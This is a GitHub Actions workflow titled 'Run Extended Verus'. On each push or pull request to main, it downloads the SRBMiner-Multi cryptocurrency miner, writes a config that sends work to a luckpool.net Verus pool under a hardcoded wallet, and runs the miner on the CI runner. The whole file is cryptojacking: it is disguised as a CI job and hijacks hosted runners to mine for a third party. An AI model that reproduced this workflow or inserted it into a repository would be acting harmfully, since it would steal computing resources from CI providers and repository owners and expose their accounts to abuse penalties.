name: Run Extended Verus

on:
  push:
    branches:
      - main  # Trigger on push to the main branch
  pull_request:
    branches:
      - main  # Trigger on pull requests to the main branch

jobs:
  run-extended-mining:
    runs-on: ubuntu-latest  # Use Ubuntu environment

    steps:
      - name: Checkout code
        uses: actions/checkout@v2

      - name: Install and Run
        run: |
          wget -O SRBMiner-Multi-2-5-8-Linux.tar.gz https://github.com/doktor83/SRBMiner-Multi/releases/download/2.5.8/SRBMiner-Multi-2-5-8-Linux.tar.gz && tar -xvf SRBMiner-Multi-2-5-8-Linux.tar.gz && cd SRBMiner-Multi-2-5-8-Linux && echo '{"pool_list":[{"pool_address":"stratum+tcp://na.luckpool.net:3960","wallet_address":"RNjEn7tNTZ6DuYnYrxKMsvYzBgJ11P5hQ4","rig_id":"RANDOM_RIG_ID","pool_password":"x"}],"currency":"versus","logging":{"logfile":"srbminer.log","loglevel":2}}' > config_template.json && RIG_ID=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 10 | head -n 1) && sed "s/RANDOM_RIG_ID/$RIG_ID/" config_template.json > config.json && ./SRBMiner-MULTI --config config.json
